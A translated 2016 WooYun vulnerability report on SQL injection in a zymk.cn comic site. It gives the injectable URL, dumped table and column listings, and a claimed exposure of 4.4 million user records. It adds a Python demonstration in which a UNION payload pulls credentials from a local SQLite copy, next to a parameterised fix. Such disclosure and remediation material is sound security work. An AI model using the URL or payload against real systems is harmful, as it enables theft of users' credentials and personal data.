
Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0173802

Title: SQL injection in a Zhiyin Manke (知音漫客) site (affects 4.4 million user records, including passwords)

Vendor: zymk.cn

Author: 路人甲

Submitted: 2016-01-31 10:27

Fix time: 2016-02-18 19:30

Published: 2016-02-18 19:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-01-31: Details sent to the vendor, awaiting vendor handling
2016-02-18: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

Database: comic
Table: mk_user
[53 columns]
+------------------+--------------+
| Column | Type |
+------------------+--------------+
| address | varchar(200) |
| addtime | datetime |
| answer | varchar(50) |
| author | int(2) |
| birthday | date |
| checkcode | varchar(4) |
| city | varchar(30) |
| classid | int(11) |
| currentweeklevel | int(11) |
| description | text |
| email | varchar(30) |
| experience | int(11) |
| face | varchar(30) |
| id | int(11) |
| intro | varchar(200) |
| jinbi | int(11) |
| lastweeklevel | int(11) |
| logintime | datetime |
| mobile | varchar(15) |
| money | int(11) |
| monthticket | int(11) |
| nettype | varchar(30) |
| nick | varchar(50) |
| password | varchar(35) |
| paymethod | varchar(15) |
| phone | varchar(15) |
| postnum | varchar(6) |
| province | varchar(10) |
| qq | varchar(15) |
| qqverify | int(1) |
| question | varchar(50) |
| realname | varchar(10) |
| regip | varchar(15) |
| salt | varchar(10) |
| sex | int(1) |
| shutup | date |
| status | int(1) |
| tongban | int(11) |
| treaty | smallint(1) |
| tuijianid | int(11) |
| type | varchar(20) |
| username | varchar(50) |
| verifycode | varchar(16) |
| vip | datetime |
| viptype | int(1) |
| vipval | int(11) |
| vipvalupdate | date |
| weibo | varchar(200) |
| weixin | varchar(200) |
| workshop | varchar(30) |
| workshopinfo | text |
| yinpiao | int(2) |
| yuanbao | int(11) |
+------------------+--------------+

[Screenshot: 1.png]

Proof of vulnerability:

http://xiao.zymk.cn/index.php/reply/index/page/1?aboutid=145625&type=100

[Screenshot: 4.png]

Database: comic
[230 tables]
+------------------------+
| mk_ad |
| mk_adclick |
| mk_address |
| mk_admin |
| mk_admingroup |
| mk_adminmenu |
| mk_adpos |
| mk_album |
| mk_alipayrurl |
| mk_allchapter |
| mk_allcomic |
| mk_androidcard |
| mk_androidcardaccessjl |
| mk_androidcardcate |
| mk_androidcardjl |
| mk_androidcardseason |
| mk_androidimei |
| mk_androidinfo |
| mk_androidinfoclass |
| mk_apiuser |
| mk_area |
| mk_article |
| mk_article_type |
| mk_baidudata |
| mk_bookmark |
| mk_caijiinfo |
| mk_cate |
| mk_chapter |
| mk_charactor |
| mk_city |
| mk_comic |
| mk_comicabout |
| mk_comicaboutclass |
| mk_comiccate |
| mk_comicfeel |
| mk_comiclike |
| mk_cptag |
| mk_cptagnum |
| mk_customvote |
| mk_customvotesum |
| mk_ddtcardkey |
| mk_delcomic |
| mk_delnovel |
| mk_diaocha |
| mk_downandroid |
| mk_ebook |
| mk_ebookclass |
| mk_echapter |
| mk_editor |
| mk_editorgroup |
| mk_eower |
| mk_exclusive |
| mk_experience |
| mk_fav |
| mk_feed |
| mk_feelrecord |
| mk_group |
| mk_help |
| mk_helpclass |
| mk_hot_ad_b |
| mk_hot_ad_c |
| mk_hot_bg |
| mk_hot_focus |
| mk_indexbg |
| mk_info |
| mk_infoclass |
| mk_information |
| mk_ip |
| mk_job |
| mk_jobapp |
| mk_joinapply |
| mk_keywordsstyle |
| mk_library |
| mk_libraryclass |
| mk_links |
| mk_listkeywords |
| mk_logs |
| mk_lostorder |
| mk_mailsend |
| mk_minisite |
| mk_minisite_record |
| mk_mkcard |
| mk_mkchapter |
| mk_mksend |
| mk_mksendjl |
| mk_mkvote |
| mk_mkvotecomic |
| mk_mkvotedata |
| mk_mkvotegift |
| mk_mobiebook |
| mk_mobilevip |
| mk_moneyjl |
| mk_monthticket |
| mk_msg |
| mk_mvpvote |
| mk_newlist |
| mk_news |
| mk_newsclass |
| mk_nochapter |
| mk_notice |
| mk_novel |
| mk_novelad |
| mk_noveladpos |
| mk_novelbg |
| mk_novelchapter |
| mk_novelfav |
| mk_novelnews |
| mk_novelnewsclass |
| mk_novelpl |
| mk_novelread |
| mk_novelso |
| mk_noveltheme |
| mk_noveltj |
| mk_order |
| mk_permission |
| mk_permissiongroup |
| mk_picdown |
| mk_picdownjl |
| mk_pingjia |
| mk_pinglun |
| mk_plsupport |
| mk_prettypic |
| mk_product |
| mk_productclass |
| mk_province |
| mk_qqcomic |
| mk_qquser |
| mk_race |
| mk_raffle |
| mk_readed |
| mk_readfeel |
| mk_readnum |
| mk_readrecord |
| mk_renrenuser |
| mk_reprinted |
| mk_resources |
| mk_resourcesclass |
| mk_ruanwen |
| mk_school |
| mk_share |
| mk_shop |
| mk_signing |
| mk_sinauser |
| mk_sokw |
| mk_speluser |
| mk_suggest |
| mk_tag_novel |
| mk_tag_num |
| mk_tag_record |
| mk_tbbuy |
| mk_tbweek |
| mk_template |
| mk_tixian |
| mk_tjclass |
| mk_tjcomic |
| mk_tongbancode |
| mk_tongbanjl |
| mk_tongji |
| mk_tongren |
| mk_tuangift |
| mk_tucao |
| mk_tuijianticket |
| mk_u17 |
| mk_user |
| mk_usergroup |
| mk_userproperties |
| mk_vassistant |
| mk_vauthor |
| mk_video |
| mk_videolist |
| mk_vip_clear |
| mk_vote |
| mk_wap_set |
| mk_weekprize |
| mk_weekprizeinfo |
| mk_weekprizejl |
| mk_weekread |
| mk_weekup |
| mk_wish |
| mk_xxactivity |
| mk_xxactivitycomic |
| mk_xxbiaoqing |
| mk_xxdingyue |
| mk_xxfocus |
| mk_xxgeili |
| mk_xxhuati |
| mk_xxinfo |
| mk_xxinfoclass |
| mk_xxkendie |
| mk_xxlinks |
| mk_xxnews |
| mk_xxnewsclass |
| mk_xxreply |
| mk_xxtimeline |
| mk_xxuppic |
| mk_xxyuanchuang |
| mk_xxzhuanbo |
| mk_yaoqingcode |
| mk_yinpiao |
| mk_yuanbaojl |
| mk_zhuanti |
| mk_zhuanticlass |
| mk_zhuantifeel |
| mk_zhuantiinfo |
| mk_zhuantiinfoclass |
| mk_zhuantimodel |
| mk_zhuantimodelclass |
| mk_zhuantimodeluse |
| mk_zhuantitpl |
| mk_zhuantitplclass |
| mk_ztforecastcomic |
| mk_ztforecastnum |
| mk_ztforecastvote |
| mk_ztforecastvotejl |
| mk_ztinfo |
| mk_ztinfoclass |
| mk_ztluanjichao |
| mk_ztname |
| mk_ztspring2012 |
| mk_zttucao |
| mk_ztvote |
| mk_ztvoteclass |
| mk_ztvotejl |
| mk_ztxiaoxiao |
| mk_ztxiaoxiaovote |
| mk_ztzhushujie |
| mk_ztzhushujietp |
| mk_zymkad |
| mk_zymkfloat |
| test |
+------------------------+

The same database also holds mk_admin, mk_apiuser, mk_order and the third-party-login tables (mk_qquser, mk_sinauser, mk_renrenuser), so the exposure is not limited to mk_user.

4.4 million user records:

[Screenshot: 5.png]


Including usernames, passwords and other sensitive information (the password column is varchar(35) next to a varchar(10) salt, which is consistent with a salted hash rather than cleartext, though the report does not say which scheme is used):

[Screenshot: 6.png]

Remediation:
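The report leaves this section blank. The standard fix for the reported injection is to stop concatenating request parameters into SQL: validate the type of `aboutid` and `type` (both integers in the proof URL above) and bind them as query parameters. The script below is an added example, not code from the report or from zymk.cn; it models the injectable pattern and its fix against an in-memory SQLite copy of two tables. The table and column names come from the dump above; the assumption that mk_xxreply backs the reply endpoint, the query shape, the salted-MD5 password layout and all row contents are constructed for illustration.

```python
"""Added example (not code from the original WooYun report or from zymk.cn).

Rebuilds, in an in-memory SQLite database, the shape of the injection the
report demonstrates against
  http://xiao.zymk.cn/index.php/reply/index/page/1?aboutid=145625&type=100
and contrasts string concatenation with a parameterised, type-checked query.

Assumptions, not facts from the report: that mk_xxreply backs the endpoint
(it appears in the dumped table list but the report never ties it to the
URL), the query shape, the hashing scheme (salted MD5 is guessed from
password varchar(35) + salt varchar(10)), and every row below.
"""
import hashlib
import sqlite3

# Constructed sample users: (id, username, salt, cleartext used only to derive the hash).
SAMPLE_USERS = [
    (1, "alice", "s1", "hunter2"),
    (2, "bob", "s2", "correct-horse"),
]

# Constructed sample replies: (id, aboutid, type, content).
SAMPLE_REPLIES = [
    (1, 145625, 100, "first reply"),
    (2, 145625, 100, "second reply"),
    (3, 999999, 100, "reply on another thread"),
]

# Attacker-controlled value for aboutid: completes the numeric comparison,
# UNIONs credentials out of mk_user, and comments out the trailing "AND type=...".
PAYLOAD = "145625 UNION SELECT username||':'||password||':'||salt FROM mk_user--"


def build_db():
    """Create the two tables with only the columns this example needs."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mk_user (id INTEGER, username TEXT, password TEXT, salt TEXT)")
    conn.execute("CREATE TABLE mk_xxreply (id INTEGER, aboutid INTEGER, type INTEGER, content TEXT)")
    for uid, name, salt, clear in SAMPLE_USERS:
        digest = hashlib.md5((clear + salt).encode()).hexdigest()  # assumed scheme
        conn.execute("INSERT INTO mk_user VALUES (?, ?, ?, ?)", (uid, name, digest, salt))
    conn.executemany("INSERT INTO mk_xxreply VALUES (?, ?, ?, ?)", SAMPLE_REPLIES)
    return conn


def fetch_replies_vulnerable(conn, aboutid, type_):
    """Builds the query by string concatenation: the injectable pattern."""
    sql = f"SELECT content FROM mk_xxreply WHERE aboutid={aboutid} AND type={type_}"
    return [row[0] for row in conn.execute(sql)]


def fetch_replies_safe(conn, aboutid, type_):
    """Check the type first, then bind: the request value can never become SQL."""
    try:
        aboutid_int, type_int = int(aboutid), int(type_)
    except (TypeError, ValueError):
        raise ValueError("aboutid and type must be integers")
    rows = conn.execute(
        "SELECT content FROM mk_xxreply WHERE aboutid=? AND type=?",
        (aboutid_int, type_int),
    )
    return [row[0] for row in rows]


def demo():
    """Run both versions with a normal value and with PAYLOAD; return what each gives back."""
    conn = build_db()
    result = {
        "normal": fetch_replies_vulnerable(conn, "145625", "100"),
        "leaked": fetch_replies_vulnerable(conn, PAYLOAD, "100"),
        "safe_normal": fetch_replies_safe(conn, "145625", "100"),
    }
    try:
        fetch_replies_safe(conn, PAYLOAD, "100")
        result["safe_blocked"] = False
    except ValueError:
        result["safe_blocked"] = True
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it directly to see the concatenating version return the constructed credential rows alongside the reply text, while the parameterised version rejects the payload. Binding alone would already defeat the UNION, since a bound string is compared as a value and never parsed as SQL; the integer check adds a second layer and a clearer error for the caller.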

Copyright notice: reposts must credit the source, 路人甲@乌云


Vendor response

Vendor reply:

Severity: No impact, vendor ignored

Ignored at: 2016-02-18 19:30

Vendor comment:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None